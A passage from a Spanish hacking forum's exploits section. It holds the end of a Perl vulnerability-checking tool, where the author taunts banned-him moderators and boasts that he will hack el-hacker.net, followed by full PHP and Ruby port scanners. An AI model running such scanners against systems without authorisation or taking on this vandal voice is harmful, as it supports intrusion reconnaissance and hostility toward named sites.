@@@@@@@@@@@****@@**@@@@@@@@@@@ *@ **@@@@
@@@@@@@@@@**@* @@**@@@@@@@@@@@**@***@@@@
@@@@@@@@@@*@@ *@@*@@@@@@@@@@@@@*@**@@@@@
@@@@@@@@@@@@* *@*@@@@@@@**@@@@@*** **@@@
@@@@@@@@@@*@* ****@@@@@@ *@@@@* @@* *@@@
@@@@@@@@@@ @**@@*  @@@@******  @@@@**@@@
@@@@@@@@@@***@@@@      *@*     @@@@@@@@@
@@@@@@@@@@@ @@@@@*   *@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@    @@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@** *@@@@@@* **@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@***@*@@@@@@@@@***@@@@@@@@

   Este programa fue escrito por Guason = me
   Este lo realice en dos fases uno  Viendo porno y otro jugando al mithlogy titans 
   Este ayuda a verificar vulnerabiliades de una web o de un archivo entero lo que me es
   mucho mas comodo .......
   Simplemente no mando saludos a nadie mmm talvez a explorer de perlenespañol y a soulnet
   los demas por mi mueranse  y pronto voy a hackear el-hacker.net muaaaaaaaaa ajajajajajajaja
  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj
   Tambien  mando saludos a los moderadores de el-hacker quienes piensan que se han desazido de      mi baneandome pero NO! porque todavia estoy ahi y me meto en sus narices

     Ja! Pero que malo que soy !

   
  Mis datos =
   
  nOMBRE = Salchichon
  Emal = [email protected]
  Web = http://guason-cracker.blogspot.com/

);


print "\n";

syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}

sub salir {
print "\n\n";
print "Good Bye\n\n\n";
exit 1;
}



Good Bye y suerte a todos
#39
Bugs y Exploits / Port Scaner By _84kur10_ & JxE-13
Febrero 25, 2010, 11:41:51 AM
Código: php
<?php

define(NAMEFILE,"ports.html");
if ($argv[1]==NULL)
{
print
"
###########     Port Scaner    By _84kur10_ , JxE-13  ##############
#                                                                  #
#        Escaner de puertos                                        #
#        Busca ports open                                 #
#==================================================================#
#  Usage: php Scan.php ip initport eofport                         #
#  M@ndrake Black Team, LatinoHackTeam, Ro0T-MaFia                 #
####################################################################\n\n";
die;
}
$init=(int)$argv[2];
$eof =(int)$argv[3];
$ip  =$argv[1];
function savePort($info)
{
$fp = fopen(NAMEFILE,"ab+");
fwrite($fp,$info."<br>");
fclose($fp);
}
savePort("<br><h1>Resultado de escan para ".$ip."</h1><br>");
savePort("c0ded by _84kur10_, JxE-13 <br>");
print "Scaneando...\n";

for ($i=$init;$i<=$eof;$i++){
$conect=fsockopen($ip, $i,$errno, $errstr, 30);
if(false==$conect)
{
print  "\nPuerto ".$i." No encontrado\n";
}
else
{
$info= "\n\nPuerto ".$i." Fue encontrado Abierto\n";
savePort($info);
print $info;
}
}

?>
#40
Bugs y Exploits / Scanner Port ( Ruby) by Guason
Febrero 25, 2010, 11:41:21 AM
Código: ruby
#Name program = Scanner-Port
#Version = beta
#Autor = Guason



require 'socket'
require 'timeout'

host=ARGV[0]
pi=ARGV[1]
pf = ARGV[2]

if !host

print "\nScanner Port by Guason\n\n"
print "Modo de uso = <HOST> <PUERTO INICIAL> <PUERTO FINAL>\n\n\n"
print "<HOST> = Ip o host a scanear\n"
print "<PUERTO INICIAL> = Puerto inicial\n"
print "<PUERTO FINAL> =Puerto final\n\n\n"
print "Written by Guason\n\n\n"
exit(1);



else

host=ARGV[0]

print "\n\nIniciando scaneo a #{host} con parametros #{pi}-#{pf}\n\n"




for port in (pi..pf)




begin
Timeout::timeout(0.2) {
sock=TCPSocket.new(host,port)
}
rescue Timeout::Error

rescue

print ""





else


print "Puerto  #{port} ABIERTO \n"



end
end



print "\n\nScaneo finalizado\n\n"
print "Written by Guason || 2009\n\n"
exit(1);


end





#Agradecimientos = protos por sus manuales bien explicados y a todo el foro Under Security
#Email Autor = [email protected]
#wEB = infierno-hacking.webcindario.com
#Blog = guason-cracker.blogspot.com
#Good Bye